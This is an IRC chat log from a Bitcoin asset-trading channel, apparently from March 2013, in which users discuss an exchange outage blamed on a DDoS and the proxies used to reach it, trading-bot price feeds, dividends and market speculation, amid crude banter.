the main domain. but you can use any of the proxies jsut fine Mar 06 19:13:54 imsaguy no. Mar 06 19:14:02 mircea_popescu: is mpex down? Mar 06 19:14:04 no sorry, the proximity gem was here: http://money.cnn.com/2013/03/06/technology/innovation/bitcoin/ Mar 06 19:14:13 lol wtf Mar 06 19:14:14 guys, I think mpex is down Mar 06 19:14:27 Can anyone get to mpex? Mar 06 19:14:32 i can Mar 06 19:14:32 I can't Mar 06 19:14:39 I heard mpex got hacked Mar 06 19:14:45 "The U.S. dollar is an obvious Ponzi scheme," said Thomas, who thinks the U.S. government has too much debt to raise interest rates high enough to defend the dollar if there were ever a run on it. With Bitcoin, "you feel like you're in control of your money." Mar 06 19:14:48 the cia probably did it Mar 06 19:14:49 ... Mar 06 19:14:57 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.21064341 = 210.6434 BTC [+] Mar 06 19:15:01 urllib2.URLError: Mar 06 19:15:04 ya totally down Mar 06 19:15:06 also trading. Mar 06 19:15:09 SINGULARITY Mar 06 19:15:09 I just knew the sec would get to mpex sooner or later Mar 06 19:15:12 imma gonna start banning Mar 06 19:15:22 oh and i almost convinced a dude that coinbr bought mpex Mar 06 19:15:28 Chilca : use something like mpex.coinbr.com to connect Mar 06 19:15:32 assbot :) Mar 06 19:15:33 why is assbot angry? Mar 06 19:15:34 jurov: you could've too Mar 06 19:15:38 caps? Mar 06 19:15:41 jurov lol Mar 06 19:16:00 watch the guy post scamtag request on you now. Mar 06 19:16:06 That's work Mar 06 19:16:36 and with ./mpex.py ? Mar 06 19:16:48 edit the url in source Mar 06 19:16:54 yeah edit the url to a proxy Mar 06 19:16:59 then edit it back Mar 06 19:17:03 assbot: did you know that mpex is down? Mar 06 19:17:04 and forth Mar 06 19:17:05 and faster Mar 06 19:17:06 slower Mar 06 19:17:08 right there Mar 06 19:17:09 aaahhh Mar 06 19:17:32 caffeine or cocaine? Mar 06 19:17:35 you know i was yest in timisoara and bough some fine asics in budapest en route, that announcement raised some eyebrows, too Mar 06 19:17:53 this before or after you fucked that giraffe ? Mar 06 19:18:07 can't remember zactly Mar 06 19:18:33 jurov must be tall to fuck a giraffe, or he likes to fuck on a ladder. ;) Mar 06 19:18:35 guy got totally plastered, hitched it with the zoo inventory. Mar 06 19:18:50 mod6 when you're hung like a snake gotta do what you gotta do. Mar 06 19:18:56 hahah Mar 06 19:18:59 neck has to be long enough or else you dip your tip in acid. Mar 06 19:19:03 Thanks Mar 06 19:19:17 ah! i'll have to keep that in mind. Mar 06 19:19:21 lol Mar 06 19:19:55 yea, without mircea's expert advice, that would've ended badly Mar 06 19:20:03 my host guy is like "you know we nullrooted some stuff" Mar 06 19:20:08 i'm like "yea, whatever" Mar 06 19:20:13 he's like "o.o" Mar 06 19:20:38 [MPEX] [O.BTCUSD.C630T] 10 @ 0.00062096 = 0.0062 BTC Mar 06 19:20:47 heh, i nullroute stuff all the time Mar 06 19:20:57 abuse? to the blackhole you go! Mar 06 19:20:59 mod6 how often do customers go "mmkay" Mar 06 19:21:47 like "nono no nullroutes, i have important businss in nigeria" Mar 06 19:22:19 night guy Mar 06 19:22:22 guys* Mar 06 19:22:25 ;;ticker Mar 06 19:22:27 BTCUSD ticker | Best bid: 47.35500, Best ask: 47.50000, Bid-ask spread: 0.14500, Last trade: 47.50000, 24 hour volume: 101716.35730182, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 44.12712 Mar 06 19:22:48 ;;goxlag Mar 06 19:22:50 91.606923 seconds Mar 06 19:22:52 ;;tslb Mar 06 19:22:56 Time since last block: 12 minutes and 53 seconds Mar 06 19:22:57 [MPEX] [S.MPOE] 20700 @ 0.00072389 = 14.9845 BTC [+] Mar 06 19:22:58 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.21125709 = 211.2571 BTC [+] Mar 06 19:22:59 ;;when does bfl deliver Mar 06 19:22:59 Error: "when" is not a valid command. Mar 06 19:23:03 right-o Mar 06 19:23:07 btw, wtf is with the longass blocks Mar 06 19:23:12 scam detected Mar 06 19:23:13 mp 4 to 6 weeks Mar 06 19:23:14 !when does bfl deliver Mar 06 19:23:26 watch out Mar 06 19:23:33 fuck you. Mar 06 19:23:37 Chaang-Noi i think that's when inaba gets his period Mar 06 19:23:40 right on the money Mar 06 19:23:45 i was asking more about the rigs Mar 06 19:23:46 [BTCTC] [ASICMINER-PT] 30 @ 0.65 = 19.5 BTC [-] Mar 06 19:23:54 hmm Mar 06 19:24:04 [BTCTC] [ASICMINER-PT] 30 @ 0.65 = 19.5 BTC [-] nice :) Mar 06 19:24:35 When can i use mpex.co? Mar 06 19:24:45 mircea_popescu: http://i.imgur.com/9fBZl3m.png Mar 06 19:24:57 Rick_: as soon as you can type mpex.coinbr.com Mar 06 19:25:53 Rick_: full story and other proxies at http://pastebin.com/xfSBf759 Mar 06 19:26:10 (09:20) < mircea_popescu> mod6 how often do customers go "mmkay" << haha, 0. the one guy I do a actual website for doesn't give a shit since he cuts down trees for a living lol Mar 06 19:26:45 cant open http://pastebin.com/xfSBf759 eaither Mar 06 19:26:55 im like, "russian hackers are fucking with the site so i tossed their packets in the bitbucket..." "huh? whats that?" ".... don't worry it's all good." Mar 06 19:26:59 but i am using coinbr now Mar 06 19:28:01 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 06 19:29:06 now i can see http://pastebin.com/xfSBf759,reading it Mar 06 19:31:52 ;;goxlag Mar 06 19:31:53 128.598356 seconds Mar 06 19:34:06 mod6 anyway, if you can't get to trilema, it's here http://pastebin.com/vRzjux7e Mar 06 19:34:18 all tghe proxy shit was set-up back in jan when somebody tried to ddos mpex Mar 06 19:34:55 smickles so what've you been up to ? did you get ddosed or something ? Mar 06 19:36:42 Rick_ hey, actually, the full pastebin is http://pastebin.com/vRzjux7e Mar 06 19:36:47 for some reason the other one got truncated. Mar 06 19:39:00 !ticker m s.dice Mar 06 19:39:01 Stupid fucking white man. Mar 06 19:39:15 ahaha he's proxy unaware huh Mar 06 19:40:27 looks like the worst of the s.dice selloff is over Mar 06 19:43:41 think the price will drop anymore today? Mar 06 19:43:46 mircea_popescu but it did work till 2 hours ago Mar 06 19:43:51 assbot Mar 06 19:44:02 jurov it gets the pushes Mar 06 19:44:13 but it doesn;t know how to get the stats Mar 06 19:44:21 ic Mar 06 19:44:27 yea im stupid like dat. Mar 06 19:44:39 ;;slap assbot Mar 06 19:45:06 watch out there. i might be dumb but i have muscle. does that erause you? Mar 06 19:45:13 erause ?! Mar 06 19:45:49 ;;facepalm Mar 06 19:45:49 Error: "facepalm" is not a valid command. Mar 06 19:46:35 arouse, mirce, arouse. was ment for jurov. Mar 06 19:48:04 ;;goxlag Mar 06 19:48:07 152.106485 seconds Mar 06 19:48:27 christ. Mar 06 19:48:29 ^ it's not over Mar 06 19:48:46 have they mentioned any reasons for all the lag? Mar 06 19:49:09 Anyone have theories as to why this runup is so fast then? Is it driven by MPEX futures, or trader manipulation, or is this how the Fed kills BTC: it just buys them all? << historically mpex futures tend to quench rallies (and probably drops too) rather than amplify them Mar 06 19:49:09 shitty sysadmins Mar 06 19:49:10 beatles yesterdays goes through my mind when you do ;;goxlag Mar 06 19:49:35 the reason is that bitcoin which'd normally hit the exchanges pushing the price gets sterilized on derivative trades on mpex Mar 06 19:52:23 ;;asks 49 Mar 06 19:52:29 There are currently 3655.519 bitcoins offered at or under 49.0 USD, worth 177792.647437 USD in total. | Data vintage: 0.0017 seconds Mar 06 20:00:32 [MPEX] [S.MPOE] 4800 @ 0.00072389 = 3.4747 BTC [+] Mar 06 20:01:52 ;;ticker Mar 06 20:01:53 BTCUSD ticker | Best bid: 47.23000, Best ask: 47.40500, Bid-ask spread: 0.17500, Last trade: 47.40500, 24 hour volume: 106149.33438063, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 44.27059 Mar 06 20:02:06 so eerie Mar 06 20:04:24 "Karen Webster ‏@karenmpd Mar 06 20:04:24 Regulation can stand in the way of innovation in the interest of protecting consumers. What do entrepreneurs do?" Mar 06 20:04:32 Mircea Popescu ‏@Mircea_Popescu Mar 06 20:04:32 @karenmpd They move. Consumers don't get a say, that's what the definition of consumer implies : "stfu, swallow the menu, say ty". Mar 06 20:04:42 i think it was about time twitter got a dose of mp. Mar 06 20:06:54 wtb faster bitcoin confirmations Mar 06 20:07:16 primeasic sells 1000 fast confirmations for 0.5 btc Mar 06 20:07:19 5000 for 2 btc Mar 06 20:07:21 10000 for 3 btc Mar 06 20:07:36 can kako pick them up for me? Mar 06 20:08:01 only if you wait till he's not slept for a day first. Mar 06 20:11:39 mircea_popescu, thanks for the reply above. Could someone rich in cash & BTC, holding BTC futures/options at say a $50 strike could have an incentive to buy up BTC to that level to not lose on the option trade? Mar 06 20:12:03 Or am I a) paranoid? b) ill-informed? c) both? Probably c) Mar 06 20:12:32 unbalanced, there were tries , but mostly not successful afaik Mar 06 20:12:49 oh, I missed mircea's reply. What's up with MPEx? Mar 06 20:12:57 ddos Mar 06 20:13:28 [BTCTC] [B.YABMC] 10 @ 0.0073 = 0.073 BTC [+] Mar 06 20:13:48 Namworld: see http://mpex.coinbr.com Mar 06 20:14:27 ah, an alternative frontend Mar 06 20:14:58 not a frontend, just proxy Mar 06 20:14:58 <[\\\]> whatever happened to solidcoin? Mar 06 20:15:12 Still a scam? Mar 06 20:15:17 [\\\]: you're digging it out of grave Mar 06 20:16:24 <[\\\]> oh, damn Mar 06 20:16:32 <[\\\]> I went to the website and the latest news is from January Mar 06 20:16:35 <[\\\]> 2012 Mar 06 20:25:55 unbalanced in theory this is possible. however this theory tends to blow up in practice. it's no different from any attempt to corner a market, and those have historically ended up poorly. Mar 06 20:26:18 more importantly, the mpoe bot book is limited. you can't get much more than 20k or so notional exposure per strike Mar 06 20:26:39 with a lot of finesse you could construct synthetic positions of maybe 100k, but not 1mn and over. Mar 06 20:27:22 moreover because all trade settles in btc on mpex that defacto sterilizes some currency too Mar 06 20:27:55 in short : i've put a lot of thinking into creating macrostability here, i obviously may have overlooked holes/been stupid/etc, but it won't be trivial in any case. Mar 06 20:29:51 (10:04) < mircea_popescu> i think it was about time twitter got a dose of mp. << yes! Mar 06 20:29:55 lol Mar 06 20:30:06 guerilla gardening: http://youtu.be/EzZzZ_qpZ4w Mar 06 20:30:10 ^ worth watching Mar 06 20:31:27 mircea_popescu, jurov: thx for the replies Mar 06 20:31:39 jcpham: oh man, <3 Del Taco Mar 06 20:31:57 glad to know all is well in mpex-land... time to get back to work Mar 06 20:32:20 I manufacture my own reality Mar 06 20:32:25 i like this guy Mar 06 20:32:52 ;;whowas unbalanced Mar 06 20:32:52 Error: "whowas" is not a valid command. Mar 06 20:32:55 ;;was unbalanced Mar 06 20:32:56 Error: "was" is not a valid command. Mar 06 20:32:56 someone should tell him about btc Mar 06 20:32:57 [MPEX] [S.DICE] 400 @ 0.00469999 = 1.88 BTC [+] Mar 06 20:33:04 you dont need to grow food Mar 06 20:33:11 aka money Mar 06 20:33:18 you can just grow money straight up Mar 06 20:33:25 so did s.dice get massacred because people thought mpex is gone ? Mar 06 20:33:27 can't eat money Mar 06 20:33:39 cant encrypt food Mar 06 20:33:51 fungal encryption Mar 06 20:33:54 dude this guys mind is primed for bitcoin Mar 06 20:33:59 nobody would try to reverse that Mar 06 20:33:59 eating cas coins Mar 06 20:34:19 cas coins would be hard to pass Mar 06 20:34:35 and not very nutriional Mar 06 20:34:41 7:15 t-shirt says "unkuck the world" Mar 06 20:34:46 so would be fungal encrypted food Mar 06 20:34:47 *unfuck Mar 06 20:35:13 I just need to clean my fridge Mar 06 20:35:50 also planting that shit in the middle of the LA Mar 06 20:35:58 its not useful for eating Mar 06 20:36:04 so i dunno what that dude is on Mar 06 20:36:31 the man has got him down kakobrekla Mar 06 20:36:32 meh Mar 06 20:36:57 mircea_popescu, no that happened yesterday. today dice it didn't move much Mar 06 20:38:44 this guy is awesome Mar 06 20:38:53 awsome in a stupid way Mar 06 20:39:08 jurov aha. Mar 06 20:39:35 well, na. fuck the man, plant a garden. mine some bitcoins, etc. Mar 06 20:40:29 fuck tha man, plant a garden, mine bitcoins sounds like a tshirt i need Mar 06 20:40:38 friedcat did it again Mar 06 20:40:52 jcpham: ya! Mar 06 20:41:03 sent 0.000000001/share then a div Mar 06 20:41:30 0.1 satoshi Mar 06 20:41:41 haha ya! "PLANT SOME SHIT!" Mar 06 20:41:46 thats just great Mar 06 20:42:05 america needs more people like this guy who are devoted to action Mar 06 20:42:06 [MPEX] [S.DICE] 40 @ 0.00469999 = 0.188 BTC [+] Mar 06 20:42:07 im going aquaponics when I finally get a house Mar 06 20:42:17 grow FISH and PLANTS Mar 06 20:42:57 jcpham: the UNFUCK THE WORLD t-shirt was pretty great too Mar 06 20:43:04 i'd prolly wear it everyday if I had one Mar 06 20:43:23 ;;estimate Mar 06 20:43:24 Next difficulty estimate | 4789366.42662 based on data since last change | 4948929.82503 based on data for last three days Mar 06 20:44:52 looks like om not the only one anyway https://bitcointalk.org/index.php?topic=149750.msg1591216#msg1591216 Mar 06 20:46:15 i have the same issue Mar 06 20:46:53 gave up and moved my wallet Mar 06 20:47:21 wat issue Mar 06 20:47:52 client issues Mar 06 20:48:08 i havent tried rescan yet Mar 06 20:48:35 send coin but transaction never updates Mar 06 20:48:39 is the txn confirmed? Mar 06 20:49:19 basically it does the transactions but displays incorrectly Mar 06 20:49:24 the asicminer div txn isnt Mar 06 20:49:24 if i recall correctly Mar 06 20:49:32 oh Mar 06 20:49:37 thats not confirmed Mar 06 20:49:38 so its normal to show up like that Mar 06 20:49:48 i wasnt referring to asicminer Mar 06 20:50:00 referring to someone suspecting there is an issue with desltop clienbt Mar 06 20:54:13 holy fuck Mar 06 20:54:15 https://bitcointalk.org/index.php?topic=101902.msg1590649#msg1590649 Mar 06 20:54:18 ITS ALIVE Mar 06 20:56:11 EB is like, "O if you move S.DICE I'll buy some!!! JUST KIDDING! LOL I'VE ALREADY BOUGHT HIGH AND SOLD LOW!" Mar 06 20:56:37 surpise, guy is ubertarded Mar 06 20:58:33 haha he trolls hard Mar 06 20:59:56 lol what ? Mar 06 21:00:02 aww man dank got scammer tagged Mar 06 21:00:03 http://blockchain.info/unconfirmed-transactions Mar 06 21:00:08 but he had a soul guarantee Mar 06 21:00:10 going up? Mar 06 21:00:26 yes, top floor plz Mar 06 21:01:18 ;;bc,stats Mar 06 21:01:21 Current Blocks: 224570 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1221 blocks | Next Difficulty In About: 1 week, 0 days, 8 hours, 31 minutes, and 48 seconds | Next Difficulty Estimate: 4779207.20236 | Estimated Percent Change: 9.41719 Mar 06 21:01:26 ;;ticker Mar 06 21:01:26 BTCUSD ticker | Best bid: 48.00000, Best ask: 48.05000, Bid-ask spread: 0.05000, Last trade: 48.05000, 24 hour volume: 104401.10769022, 24 hour low: 39.50000, 24 hour high: 49.09900, 24 hour vwap: 44.61632 Mar 06 21:02:04 eat your heart out bernakazi Mar 06 21:03:31 EskimoBob: :) Mar 06 21:05:20 MPOE-PR stepped on your nuts huh? Mar 06 21:06:21 i dunno, why all the hard trolls & h8tred? Mar 06 21:07:30 http://trilema.com/2013/the-delusion-of-infrastructure/ Mar 06 21:07:40 the latest installment in mpanthropology. Mar 06 21:07:54 EskimoBob: *shrug* Mar 06 21:09:43 does bitpay being on amazon make us legit now? Mar 06 21:09:47 I'm pretty sure you are MP, being your own troll Mar 06 21:10:36 dutifully moved right along to the next helping of predigested yet certifiedly safe circlejerk product. << exactly. Mar 06 21:11:37 deadweasel im who ? Mar 06 21:13:46 -0.002! Mar 06 21:14:01 1 BTC = 47.93000 U.S. dollars = 36.7758766 Euros Mar 06 21:17:49 [MPEX] [S.MPOE] 6450 @ 0.00072389 = 4.6691 BTC [+] Mar 06 21:20:30 What's up with options? Mar 06 21:22:12 now what sort of unanswerable question is that ? Mar 06 21:22:50 ah, nvm. I guess I was consistently refreshing right when options were not up. Mar 06 21:23:13 I refreshed twice and no options were showing up from the market bot. Mar 06 21:23:40 ya there's ocasionally a momentary gap Mar 06 21:24:23 i think it's broken. ;) Mar 06 21:24:47 your reasoning seems broken... time to get some S.DICE Mar 06 21:25:07 you're right! buy moar! Mar 06 21:25:57 time not panic yet Mar 06 21:27:19 deadweasel the valuation by last trade algo is prolly dubious Mar 06 21:27:23 !ticker m s.dice Mar 06 21:27:25 [MPEX:S.DICE] 1D: 0.00300001 / 0.00452788 / 0.0052 (39220 shares, 177.58 BTC), 7D: 0.00300001 / 0.00577697 / 0.0063799 (549867 shares, 3,176.57 BTC), 30D: 0.00300001 / 0.00588503 / 0.007395 (6670790 shares, 39,257.82 BTC) Mar 06 21:27:33 30day avg prolly more reasonable. Mar 06 21:27:43 !ticker m ^oix Mar 06 21:27:45 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08954763 / 47.56142347 / 49.63791534 (no shares, 17,752.74 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 21:27:45 deaweasel - measure in USD make you feel a bit better Mar 06 21:28:09 [MPEX] [X.IDIFF.MAR] 3 @ 0.0639995 = 0.192 BTC [-] Mar 06 21:28:52 yeah, I need to stop looking at bitfunder. I just want to watch things happen. Mar 06 21:29:15 i like observing this thing. this, bitcoin, thing. Mar 06 21:29:41 i'm addicted to bitcoins Mar 06 21:37:49 mircea_popescu: how often is the oix updated? Mar 06 21:38:12 every time options sell pretty much Mar 06 21:42:43 has any one else been eating popcorn and watching Krugman try to battle the guys on ZH? Mar 06 21:43:27 not sure if its really him... but it's entertaining either way Mar 06 21:43:52 not rly. Mar 06 21:43:57 EURO is $1.2999?!? Mar 06 21:44:04 hard to tell which is the larger idiot, the zh borg or krugman Mar 06 21:45:32 about there ya Mar 06 21:45:36 ;;ticker Mar 06 21:45:37 BTCUSD ticker | Best bid: 47.35000, Best ask: 47.45780, Bid-ask spread: 0.10780, Last trade: 47.35000, 24 hour volume: 105673.56321148, 24 hour low: 39.51020, 24 hour high: 49.09900, 24 hour vwap: 44.82315 Mar 06 21:45:58 new video of avalon trying to ship units Mar 06 21:46:00 http://www.vice.com/en_au/read/the-strange-beauty-of-the-chinese-politician-who-lost-his-shit-at-the-airport Mar 06 21:46:24 lol Mar 06 21:48:12 yeah, some of those guys on ZH are somewhat entertaining Mar 06 21:49:07 there seems to be a real lack of brains when it comes to bitcoin on there though Mar 06 21:50:36 I have seen no surplus in brains anywhere in bitcoin, except a few here and there. Mar 06 21:51:17 bitcoin has been my financial baptism by fire. lucky I made money while learning Mar 06 22:02:26 this is not the normal channel welcome message Mar 06 22:03:25 Lyspooner, wat? Mar 06 22:03:51 Lyspooner the scams there got moved to bitcoin-assets.com Mar 06 22:03:59 "channel flooding and no channel staff around to help? Please check with freenode support: http://freenode.net/faq.shtml#gettinghelp" Mar 06 22:04:30 a, that's standard freenode stuff Mar 06 22:05:05 [HAVELOCK] [SDICE] 10 @ 0.4405 = 4.405 BTC [-] Mar 06 22:05:57 normally it's a list of all the sites that house bitcoin assets Mar 06 22:06:20 you mean the topic? Mar 06 22:06:25 https://bitcointalk.org/index.php?topic=93445.msg1591950#msg1591950 this is cute. Mar 06 22:08:31 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 06 22:08:48 bugpowder yeah Mar 06 22:09:09 "Hi everyone! Mar 06 22:09:09 Massage4BTC.com is now operational and lets anyone offer local massage services for BTC." Mar 06 22:09:10 le lol. Mar 06 22:09:40 "herpderp i learned sort-of webcoding over the summer so now i start a business where other people do the work. it's a platform." Mar 06 22:10:05 lmao Mar 06 22:11:04 mircea_popescu, wait...isn't that what mpex does? Mar 06 22:11:20 S.DICE makes the money - you get rich lol Mar 06 22:11:31 haha not quite. Mar 06 22:12:06 what've they traded since august, say 200k btc or so ? i've made 400 btc off that. Mar 06 22:14:04 [HAVELOCK] [SDICE] 3 @ 0.4205 = 1.2615 BTC [-] Mar 06 22:14:06 [HAVELOCK] [SDICE] 2 @ 0.42 = 0.84 BTC [-] Mar 06 22:14:38 [BTCTC] [BASIC-MINING] 10 @ 0.335 = 3.35 BTC [-] Mar 06 22:14:40 [BTCTC] [BASIC-MINING] 4 @ 0.335 = 1.34 BTC [-] Mar 06 22:15:14 [BTCTC] [BASIC-MINING] 10 @ 0.33317 = 3.3317 BTC [-] Mar 06 22:17:05 [HAVELOCK] [SDICE] 5 @ 0.42 = 2.1 BTC [-] Mar 06 22:17:06 [HAVELOCK] [SDICE] 3 @ 0.42 = 1.26 BTC [-] Mar 06 22:18:04 [HAVELOCK] [SDICE] 7 @ 0.41 = 2.87 BTC [-] Mar 06 22:18:06 [HAVELOCK] [SDICE] 5 @ 0.41 = 2.05 BTC [-] Mar 06 22:18:11 [BTCTC] [ASICMINER-PT] 25 @ 0.65 = 16.25 BTC [-] Mar 06 22:19:04 [HAVELOCK] [SDICE] 5 @ 0.4 = 2 BTC [-] Mar 06 22:19:06 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Mar 06 22:21:17 I was just wondering where I could find a massage for BTC? Mar 06 22:21:25 is there like, an internet site for that? Mar 06 22:22:07 the best massages are free Mar 06 22:25:59 [BTCTC] [BASIC-MINING] 2 @ 0.33317 = 0.6663 BTC [-] Mar 06 22:26:55 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 06 22:28:03 [MPEX] [O.BTCUSD.C450T] 640 @ 0.22052312 = 141.1348 BTC [+] Mar 06 22:33:13 !tciker m oix^ Mar 06 22:33:19 !ticker m oix^ Mar 06 22:33:20 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Mar 06 22:33:25 assbot is dead Mar 06 22:33:29 amen Mar 06 22:33:30 prefix not postfix Mar 06 22:33:32 !ticker m oix^ Mar 06 22:33:33 The round stones beneath the earth... have spoken through the fire. Mar 06 22:33:38 !ticker m ^oix Mar 06 22:33:38 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08954763 / 47.63946252 / 49.7064472 (no shares, 17,893.87 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 22:33:45 [BTCTC] [ASICMINER-PT] 3 @ 0.65 = 1.95 BTC [-] Mar 06 22:33:58 deadweasel is dead Mar 06 22:34:17 mpex.co is back online so all should work Mar 06 22:36:08 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 06 22:36:09 isn't that nanotube's bot? Mar 06 22:40:10 tankage Mar 06 22:40:11 ;;ticker Mar 06 22:40:13 BTCUSD ticker | Best bid: 46.00000, Best ask: 46.59790, Bid-ask spread: 0.59790, Last trade: 46.00000, 24 hour volume: 109849.30848531, 24 hour low: 39.79000, 24 hour high: 49.09900, 24 hour vwap: 45.00791 Mar 06 22:41:45 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 06 22:42:31 deadweasel,no,gribble is nanotube's. assbot has borrowed intelligence from kakobrekla. Mar 06 22:42:45 maybe muscles,too, dunno Mar 06 22:44:08 jurov: ok, thx. they are both nice bots. even S&M assbot, but I do that in PMs now. Mar 06 22:44:48 consider yourself lucky, i was rejected by assbot :/ Mar 06 22:44:52 tankage indeed, people must be market selling Mar 06 22:45:31 but there are some hungry sponges out there too Mar 06 22:45:54 i think today's bank wires and whatever went into bitcoins, tomorrow it may repeat Mar 06 22:46:13 when fresh fiat arrives Mar 06 22:46:22 bitcoin will eat it Mar 06 22:47:12 see u at $36. Mar 06 22:48:17 ;;goxlag Mar 06 22:48:19 80.139706 seconds Mar 06 22:48:34 ;;ticker Mar 06 22:48:35 BTCUSD ticker | Best bid: 45.27057, Best ask: 45.99000, Bid-ask spread: 0.71943, Last trade: 45.99000, 24 hour volume: 111972.55000310, 24 hour low: 39.79001, 24 hour high: 49.09900, 24 hour vwap: 45.02130 Mar 06 22:48:51 BASIC-MINING what Mar 06 22:49:09 80 seconds lag? is that normal? Mar 06 22:50:42 it wat 680sec a few hours ago Mar 06 22:50:50 [BTCTC] [ASICMINER-PT] 50 @ 0.65 = 32.5 BTC [-] Mar 06 22:50:59 yeah newsflash gox sux Mar 06 22:52:01 [MPEX] [S.DICE] 300 @ 0.0046 = 1.38 BTC [-] Mar 06 22:52:08 they're good at what they do Mar 06 22:56:05 [HAVELOCK] [SDICE] 3 @ 0.4 = 1.2 BTC [-] Mar 06 22:56:07 [HAVELOCK] [SDICE] 5 @ 0.4 = 2 BTC [-] Mar 06 22:56:07 [HAVELOCK] [SDICE] 6 @ 0.4 = 2.4 BTC [-] Mar 06 22:56:22 asicmining divs are out Mar 06 22:56:34 yup Mar 06 22:56:41 as soon as confirms are done, DT will be paying on BF Mar 06 22:56:54 stil sitting on 0 confirms... Mar 06 22:56:57 comeone mining pools Mar 06 22:57:02 [BTCTC] [S.DICE-PT] 62 @ 0.00549 = 0.3404 BTC [+] Mar 06 22:57:38 btw, G.ASICMER-PT now holders 1,020,273 confirmed ASICMINER shares Mar 06 22:57:50 er Mar 06 22:57:55 that wrong Mar 06 22:58:09 11,032 shares Mar 06 22:58:12 stupid copy buffer Mar 06 22:58:20 leotreasure how much ? Mar 06 22:59:11 [BTCTC] [ASICMINER-PT] 3 @ 0.65 = 1.95 BTC [-] Mar 06 22:59:15 .01916298 Mar 06 22:59:40 ;;ticker Mar 06 22:59:43 BTCUSD ticker | Best bid: 44.71051, Best ask: 45.00000, Bid-ask spread: 0.28949, Last trade: 45.00000, 24 hour volume: 114058.31082349, 24 hour low: 39.85750, 24 hour high: 49.09900, 24 hour vwap: 45.04732 Mar 06 22:59:46 the last was 0.02354460 Mar 06 22:59:51 and it was for all earnings up to that point Mar 06 22:59:57 that means the last week picked up a lot of earnings Mar 06 23:00:19 next week should easily surpass it Mar 06 23:00:32 going down !? Mar 06 23:00:42 btc or AM? Mar 06 23:00:44 ah, what interval was the first for ? Mar 06 23:00:46 am Mar 06 23:00:55 like 2~3 weeks? Mar 06 23:00:58 ah i c Mar 06 23:01:16 HAHAH one million shares was a bit strong xD Mar 06 23:01:21 yeah Mar 06 23:01:24 I has sdice open Mar 06 23:01:29 and copied the wrong thing :P Mar 06 23:05:48 hey gais Mar 06 23:06:03 sup Mar 06 23:06:07 i sold some coins for $50 today Mar 06 23:06:11 ;;ticker Mar 06 23:06:13 BTCUSD ticker | Best bid: 44.20000, Best ask: 44.71051, Bid-ask spread: 0.51051, Last trade: 45.00000, 24 hour volume: 114660.97979107, 24 hour low: 39.85750, 24 hour high: 49.09900, 24 hour vwap: 45.05104 Mar 06 23:06:43 how is that even acceptable or possible Mar 06 23:06:57 bad deal. Mar 06 23:07:01 you'll regret it later. Mar 06 23:07:05 I sold a nice chunk at 46-49 Mar 06 23:07:15 I do not regret it now Mar 06 23:07:15 mircea_popescu: 5 coins... Mar 06 23:07:21 ! Mar 06 23:07:39 i ;;ticker Mar 06 23:07:43 ;;ticker Mar 06 23:07:51 i sold 5 coins during the height of the day for shits and giggles Mar 06 23:07:56 BTCUSD ticker | Best bid: 44.20000, Best ask: 44.50000, Bid-ask spread: 0.30000, Last trade: 44.50000, 24 hour volume: 114844.81528356, 24 hour low: 39.85750, 24 hour high: 49.09900, 24 hour vwap: 45.05435 Mar 06 23:07:58 i wish mtgoxlive would work better. Mar 06 23:08:01 https://bitcointalk.org/index.php?topic=101902.msg1592056#msg1592056 Mar 06 23:08:06 lol girl laying the smackdown Mar 06 23:08:17 i can't believe forum idiots actually propose btctalk as a comparison for anything. Mar 06 23:08:38 "girl" Mar 06 23:08:58 try "me" Mar 06 23:08:59 anyone know EXACTLY how wash sale rules effect a long-term cap gain? As in, if I buy a stock for $5, sell it 8 months later for $10, rebuy for $9 the next day then sell again for $50 8 months after that. Mar 06 23:09:06 Lyspooner why does her gender bother you so ? Mar 06 23:09:10 http://www.economicsofbitcoin.com/2013/03/re-bitcoin-bubble-20-by-patrik-korda.html Mar 06 23:10:13 who is patrik-korda Mar 06 23:10:16 Is the $50 sale considered long-term or short term Mar 06 23:10:39 I know the $10 sale is short term, despite the wash sale repurchase. Mar 06 23:10:41 http://seekingalpha.com/instablog/7761841-patrik-korda/1616371-bitcoin-bubble-2-0 Mar 06 23:10:43 ^ korda Mar 06 23:11:02 jcpham ok, some idiot who came up with the brilliant idea that because the cost of making websites is small, the internet will never exist Mar 06 23:11:11 because myspace profiles will compete each other into irrelevance Mar 06 23:11:21 i am impressed. who spawns all these idiots ? Mar 06 23:11:47 http://apoplithorismosphobia.com/files/ex.pdf Mar 06 23:12:31 lol Mar 06 23:12:36 spontaneous idiogeneration ? Mar 06 23:13:09 Study Program: Liberal Arts Mar 06 23:13:09 Field of Study: 3. 1. 6 Political Science Mar 06 23:13:11 ok nm. Mar 06 23:13:37 According to the Communist Manifesto, there were three major reasons why capitalism would come to a halt. Mar 06 23:13:45 ^from abstract Mar 06 23:14:16 one of them being that youthful cocks with milkstrings still atached will end up publishing on wanna-be "respectable" venues a la seeking alpha as if they were people. Mar 06 23:14:59 basically, we're being trolled. Mar 06 23:15:05 lol i never heard about this school.. prolly too many "higher education" schools around Mar 06 23:15:20 in one 450-thousand city Mar 06 23:15:26 every halfwit with a "liberal arts" degree in nothing specifically from Nowhere University is going to, on the mid term, publish a finite nonzero number of papers Mar 06 23:15:30 consisting of nothing at all. Mar 06 23:16:31 From a historical standpoint, major economic bubbles are a rare phenomenon. Unlike business cycles, which occur quite frequently and with great regularity, there have not been many bubbles throughout history. Mar 06 23:16:43 first two sentences from the body text Mar 06 23:16:47 i can't even write about this shit, it'd be doing it favours ;/ Mar 06 23:16:48 i cant even... Mar 06 23:19:15 scott sumner on bitcoin bubbles 